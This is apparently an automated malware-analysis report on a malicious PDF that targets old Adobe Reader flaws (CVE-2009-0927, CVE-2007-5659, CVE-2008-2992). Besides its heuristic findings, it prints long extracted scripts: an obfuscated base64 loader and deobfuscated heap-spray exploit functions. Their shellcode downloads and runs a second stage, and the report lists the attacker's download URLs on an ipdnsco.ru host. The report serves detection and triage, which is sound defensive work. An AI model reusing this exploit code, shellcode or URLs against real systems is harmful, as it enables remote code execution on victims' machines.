MALICIOUS
Risk Score: 578
Malware Insights
MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
The PDF file contains embedded JavaScript that exploits multiple known Adobe Reader vulnerabilities, including CVE-2009-0927, CVE-2007-5659, and CVE-2008-2992. The deobfuscated JavaScript functions such as `util_printf` and `collab_email` heap-spray shellcode designed to download and execute a second-stage payload from the listed URLs. This indicates a clear intent to compromise the user's system through exploit execution.
Machine Learning
- Nyx PDF Classifier: malicious score 1.0000
Heuristics (13)
- Collab.getIcon — CVE-2009-0927 [critical; CVE match: exact; rule CVE_2009_0927]: PDF JavaScript calls Collab.getIcon. CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
- Collab.collectEmailInfo — CVE-2007-5659 [critical; CVE match: exact; rule CVE_2007_5659]: PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- util.printf — CVE-2008-2992 [critical; CVE match: exact; rule CVE_2008_2992]: PDF JavaScript calls util.printf(). CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by a long format-specifier argument. Widely exploited in the wild after disclosure. (identified after JavaScript deobfuscation)
- Pidief-style multi-CVE JavaScript dispatcher [critical; CVE match: likely; rule PDF_PIDIEF_MULTI_CVE_DISPATCH]: A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file.
- Multi-CVE Adobe Reader JavaScript exploit kit [critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT]: One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF selects old Reader vulnerabilities by viewer version and runs heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action [low; 3 related findings; rule PDF_JAVASCRIPT]: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster [critical; rule PDF_JS_EXPLOIT_CLUSTER]: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- PDF JavaScript shellcode contains an embedded download URL [high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL]: Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream [low; rule PDF_JS]: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage [high; rule PDF_GENERIC_STAGE_RECOVERY]: Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- ASCIIHexDecode filter (with exploit indicators) [medium; rule PDF_FILTER_HEX]: Hex-encoding filter present alongside exploit delivery indicators; often used to hide payload or shellcode bytes.
- Suspicious extracted artifact [info; rule EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info; rule EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ipdnsco.ru/tbGPV1hMHXeKt4PuNETRPiggvSxhnEzH?p&x=i900&&s=printf& (referenced by PDF JavaScript)
  - http://ipdnsco.ru/tbGPV1hMHXeKt4PuNETRPiggvSxhnEzH?p&x=i900&&s=email& (referenced by PDF JavaScript)
  - http://ipdnsco.ru/tbGPV1hMHXeKt4PuNETRPiggvSxhnEzH?p&x=i900&&s=gicon& (referenced by PDF JavaScript)
  - http://ipdnsco.ru/tbGPV1hMHXeKt4PuNETRPiggvSxhnEzH?p&x=i900&&s=newp& (referenced by PDF JavaScript)
Extracted artifacts (3)
Files carved from inside the sample during analysis.

Artifact 1: javascript_obj0008_000.js
- Hash: 7bb8c87d8e72c434280ff15e011ebf25bd0cf6ffcd9d97975fed649910d1ffb3
- Kind: pdf-javascript-stream
- Source: PDF /JS object 8 at offset 0x1CE
- Size: 99528 bytes
- Detection (ClamAV): No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
var xxxxxxxxxxxxxxxxxxxxx = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
var sss=event;
var ddd=this;
var fff=/TTZZ/ig;
var sfc=String.fromCharCode;
function FRhJOtyljg1(BEqqXRVHic6) {
var lTgnkbeLhM2 = "";
var KyoSbejQHT31, KyoSbejQHT32, KyoSbejQHT33 = "";
var UMkCWyvUkf41, UMkCWyvUkf42, UMkCWyvUkf43, UMkCWyvUkf44 = "";
var i = 0;
var BWyhJiJour5 = /[^A-Za-z0-9\+\/\=]/g;
if (BWyhJiJour5["ex"+"ec"](BEqqXRVHic6)) {}
BEqqXRVHic6 = BEqqXRVHic6.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do {
UMkCWyvUkf41 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](BEqqXRVHic6.charAt(i++));
UMkCWyvUkf42 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](BEqqXRVHic6.charAt(i++));
UMkCWyvUkf43 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](BEqqXRVHic6.charAt(i++));
UMkCWyvUkf44 = xxxxxxxxxxxxxxxxxxxxx["ind"+"exOf"](BEqqXRVHic6.charAt(i++));
KyoSbejQHT31 = (UMkCWyvUkf41 << 2) | (UMkCWyvUkf42 >> 4);
KyoSbejQHT32 = ((UMkCWyvUkf42 & 15) << 4) | (UMkCWyvUkf43 >> 2);
KyoSbejQHT33 = ((UMkCWyvUkf43 & 3) << 6) | UMkCWyvUkf44;
lTgnkbeLhM2 = lTgnkbeLhM2 + sfc(KyoSbejQHT31);
if (UMkCWyvUkf43 != 63+1) {
lTgnkbeLhM2 = lTgnkbeLhM2 + sfc(KyoSbejQHT32);
}
if (UMkCWyvUkf44 != 63+1) {
lTgnkbeLhM2 = lTgnkbeLhM2 + sfc(KyoSbejQHT33);
}
KyoSbejQHT31 = KyoSbejQHT32 = KyoSbejQHT33 = "";
UMkCWyvUkf41 = UMkCWyvUkf42 = UMkCWyvUkf43 = UMkCWyvUkf44 = "";
} while (i < BEqqXRVHic6.length);
return lTgnkbeLhM2;
}
var ggg="itPa";
var cadka = sss[FRhJOtyljg1("d*&*&*G*&*&*F*&*&*y*&*&*Z*&*&*2*&*&*V*&*&*0*&*&*")];
cadka[FRhJOtyljg1("e*&*&*m*&*&*9*&*&*v*&*&*b*&*&*V*&*&*R*&*&*5*&*&*c*&*&*G*&*&*U*&*&*=*&*&*")] = "F"+ggg+"ge";
var zgggzz = FRhJOtyljg1("Q*&*&*2*&*&*1*&*&*a*&*&*M*&*&*W*&*&*J*&*&*t*&*&*T*&*&*j*&*&*B*&*&*h*&*&*V*&*&*1*&*&*R*&*&*U*&*&*W*&*&*l*&*&*o*&*&*5*&*&*d*&*&*U*&*&*l*&*&*H*&*&*W*&*&*n*&*&*B*&*&*l*&*&*R*&*&*j*&*&*l*&*&*w*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*m*&*&*R*&*&*D*&*&*a*&*&*D*&*&*V*&*&*Z*&*&*W*&*&*E*&*&*p*&*&*6*&*&*Y*&*&*0*&*&*N*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*d*&*&*2*&*&*d*&*&*i*&*&*R*&*&*1*&*&*Z*&*&*1*&*&*S*&*&*1*&*&*N*&*&*C*&*&*N*&*&*1*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*D*&*&*b*&*&*m*&*&*R*&*&*v*&*&*Y*&*&*V*&*&*d*&*&*4*&*&*b*&*&*E*&*&*l*&*&*D*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*m*&*&*g*&*&*1*&*&*W*&*&*V*&*&*h*&*&*K*&*&*e*&*&*m*&*&*N*&*&*D*&*&*N*&*&*X*&*&*N*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*W*&*&*l*&*&*c*&*&*1*&*&*b*&*&*m*&*&*R*&*&*H*&*&*Z*&*&*2*&*&*d*&*&*L*&*&*a*&*&*V*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*B*&*&*e*&*&*U*&*&*l*&*&*E*&*&*d*&*&*2*&*&*d*&*&*i*&*&*R*&*&*1*&*&*Z*&*&*1*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*k*&*&*t*&*&*T*&*&*Q*&*&*j*&*&*d*&*&*l*&*&*V*&*&*0*&*&*Z*&*&*5*&*&*Y*&*&*z*&*&*N*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*Q*&*&*W*&*&*d*&*&*L*&*&*e*&*&*j*&*&*B*&*&*n*&*&*Z*&*&*V*&*&*d*&*&*G*&*&*e*&*&*V*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*j*&*&*M*&*&*0*&*&*E*&*&*3*&*&*Z*&*&*l*&*&*F*&*&*w*&*&*N*&*&*V*&*&*l*&*&*Y*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*k*&*&*p*&*&*6*&*&*Y*&*&*0*&*&*N*&*&*B*&*&*O*&*&*U*&*&*l*&*&*I*&*&*b*&*&*G*&*&*h*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*Y*&*&*2*&*&*5*&*&*O*&*&*d*&*&*0*&*&*x*&*&*u*&*&*T*&*&*j*&*&*F*&*&*Z*&*&*b*&*&*l*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*O*&*&*M*&*&*G*&*&*N*&*&*t*&*&*b*&*&*H*&*&*V*&*&*a*&*&*e*&*&*W*&*&*d*&*&*3*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*k*&*&*x*&*&*D*&*&*Q*&*&*n*&*&*N*&*&*a*&*&*V*&*&*z*&*&*R*&*&*n*&*&*T*&*&*H*&*&*l*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*Q*&*&*X*&*&*l*&*&*L*&*&*V*&*&*H*&*&*R*&*&*5*&*&*W*&*&*l*&*&*h*&*&*S*&*&*M*&*&*V*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*j*&*&*b*&*&*T*&*&*R*&*&*n*&*&*Z*&*&*V*&*&*d*&*&*G*&*&*e*&*&*W*&*&*M*&*&*z*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*k*&*&*E*&*&*3*&*&*Z*&*&*l*&*&*F*&*&*v*&*&*S*&*&*1*&*&*p*&*&*u*&*&*V*&*&*
n*&*&*V*&*&*U*&*&*V*&*&*F*&*&*p*&*&*a*&*&*W*&*&*T*&*&*N*&*&*S*&*&*c*&*&*G*&*&*I*&*&*y*&*&*N*&*&*G*&*&*d*&*&*k*&*&*W*&*&*F*&*&*R*&*&*U*&*&*W*&*&*l*&*&*p*&*&*S*&*&*c*&*&*G*&*&*J*&*&*G*&*&*O*&*&*X*&*&*d*&*&*j*&*&*b*&*&*W*&*&*x*&*&*1*&*&*V*&*&*F*&*&*R*&*&*a*&*&*W*&*&*m*&*&*R*&*&*H*&*&*W*&*&*W*&*&*9*&*&*L*&*&*U*&*&*0*&*&*I*&*&*3*&*&*
... (truncated)

Artifact 2: generic_stage_recovery_000.js
- Hash: b3d76b68d2ab6f2e51350a38f5ef8b81d26205d01a8e40d9d5353cb06b4ca207
- Kind: deobfuscated-js
- Source: generic stage recovery (base64-literal-then-strip-TTZZ) from JavaScript object 8 at offset 0x1CE
- Size: 6512 bytes
- Detection (ClamAV): Js.Exploit.Shellcode-18
- Obfuscation or payload: likely (carved artifact contains 11 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
function fix_it(yarsp, len) {
while (yarsp.length * 2 < len) {yarsp += yarsp;}
yarsp = yarsp.substring(0, len / 2);return yarsp;}
function util_printf() {
var payload = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u6F63%u722E%u2F75%u6274%u5047%u3156%u4D68%u5848%u4B65%u3474%u7550%u454E%u5254%u6950%u6767%u5376%u6878%u456E%u487A%u703F%u7826%u693D%u3039%u2630%u7326%u703D%u6972%u746E%u2666%u9000");
var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock = nop + payload;
var bigblock = unescape("%u0A0A%u0A0A");
var headersize = 20;
var spray = headersize + heapblock.length;
while (bigblock.length < spray) {bigblock += bigblock;}
var fillblock = bigblock.substring(0, spray);
var block = bigblock.substring(0, bigblock.length - spray);
while (block.length + spray < 262144) {block = block + block + fillblock;}
var mem_array = new Array;
for (var i = 0; i < 1400; i++) {mem_array[i] = block + heapblock;}
var num = 1.3e+295;
util.printf("%45000f", num);
}
function collab_email() {
var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u6F63%u722E%u2F75%u6274%u5047%u3156%u4D68%u5848%u4B65%u3474%u7550%u454E%u5254%u6950%u6767%u5376%u6878%u456E%u487A%u703F%u7826%u693D%u3039%u2630%u7326%u653D%u616D%u6C69%u0026%u9000");
var mem_array = new Array;
var cc = 202116108;
var addr = 4194304;
var sc_len = shellcode.length * 2;
var len = addr - (sc_len + 56);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 4194304) / addr;
for (var count = 0; count < count2; count++) {mem_array[count] = yarsp + shellcode;}
var overflow = unescape("%u0c0c%u0c0c");
while (overflow.length < 44952) {overflow += overflow;}
this.collabStore = Collab.collectEmailInfo({subj: "", msg: overflow});
}
function collab_geticon() {
if (app.doc.Collab.getIcon) {
var arry = new Array;
var vvpethya = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u6F63%u722E%u2F75%u6274%u5047%u3156%u4D68%u5848%u4B65%u3474%u7550%u454E%u5254%u6950%u6767%u5376%u6878%u456E%u487A%u703F%u7826%u693D%u3039%u2630%u7326%u673D%u6369%u6E6F%u0026%u9000");
var hWq500CN = vvpethya
... (truncated)

Artifact 3: generic_stage_recovery_001.js
- Hash: 345feaf156380627896a98753d671f864fbecbe41889222a94796e76a2e35e29
- Kind: deobfuscated-js
- Source: generic stage recovery (percent-decode) from JavaScript object 8 at offset 0x1CE
- Size: 6508 bytes
- Detection (ClamAV): Js.Exploit.Shellcode-18
- Obfuscation or payload: likely (carved artifact contains 11 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script):
function fix_it(yarsp, len) {
while (yarsp.length * 2 < len) {yarsp += yarsp;}
yarsp = yarsp.substring(0, len / 2);return yarsp;}
function util_printf() {
var payload = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u6F63%u722E%u2F75%u6274%u5047%u3156%u4D68%u5848%u4B65%u3474%u7550%u454E%u5254%u6950%u6767%u5376%u6878%u456E%u487A%u703F%u7826%u693D%u3039%u2630%u7326%u703D%u6972%u746E%u2666%u9000");
var nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
var heapblock = nop + payload;
var bigblock = unescape("%u0A0A%u0A0A");
var headersize = 20;
var spray = headersize + heapblock.length;
while (bigblock.length < spray) {bigblock += bigblock;}
var fillblock = bigblock.substring(0, spray);
var block = bigblock.substring(0, bigblock.length - spray);
while (block.length + spray < 262144) {block = block + block + fillblock;}
var mem_array = new Array;
for (var i = 0; i < 1400; i++) {mem_array[i] = block + heapblock;}
var num = 1.3e+295;
util.printf("E000f", num);
}
function collab_email() {
var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u6F63%u722E%u2F75%u6274%u5047%u3156%u4D68%u5848%u4B65%u3474%u7550%u454E%u5254%u6950%u6767%u5376%u6878%u456E%u487A%u703F%u7826%u693D%u3039%u2630%u7326%u653D%u616D%u6C69%u0026%u9000");
var mem_array = new Array;
var cc = 202116108;
var addr = 4194304;
var sc_len = shellcode.length * 2;
var len = addr - (sc_len + 56);
var yarsp = unescape("%u9090%u9090");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 4194304) / addr;
for (var count = 0; count < count2; count++) {mem_array[count] = yarsp + shellcode;}
var overflow = unescape("%u0c0c%u0c0c");
while (overflow.length < 44952) {overflow += overflow;}
this.collabStore = Collab.collectEmailInfo({subj: "", msg: overflow});
}
function collab_geticon() {
if (app.doc.Collab.getIcon) {
var arry = new Array;
var vvpethya = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u692F%u6470%u736E%u6F63%u722E%u2F75%u6274%u5047%u3156%u4D68%u5848%u4B65%u3474%u7550%u454E%u5254%u6950%u6767%u5376%u6878%u456E%u487A%u703F%u7826%u693D%u3039%u2630%u7326%u673D%u6369%u6E6F%u0026%u9000");
var hWq500CN = vvpethya.l
... (truncated)